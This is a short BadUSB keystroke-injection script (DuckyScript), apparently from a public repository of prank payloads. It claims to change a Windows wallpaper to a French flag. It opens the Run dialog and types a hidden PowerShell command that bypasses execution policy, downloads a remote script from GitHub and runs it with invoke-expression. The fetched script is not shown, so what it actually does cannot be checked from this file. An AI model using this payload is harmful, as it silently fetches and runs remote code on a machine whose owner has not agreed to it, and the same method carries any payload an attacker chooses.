REM ------------------------------------
REM Description: Changes wallpaper to a France image
REM Author: P-ict0 (https://github.com/P-ict0)
REM Date: 11/01/2025
REM ------------------------------------
REM This script:
REM 1. Opens a powershell terminal
REM 2. Fetches a script from this repo and runs it
REM 3. Changes your wallpaper to a French flag
REM 4. Removes the original image
REM ------------------------------------

DELAY 100

GUI r
DELAY 500

REM Download and run script
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/P-ict0/BadUSB-Scripts/main/payloads/prank/Windows/francer/francer.ps1?dl=1; invoke-expression $pl
ENTER
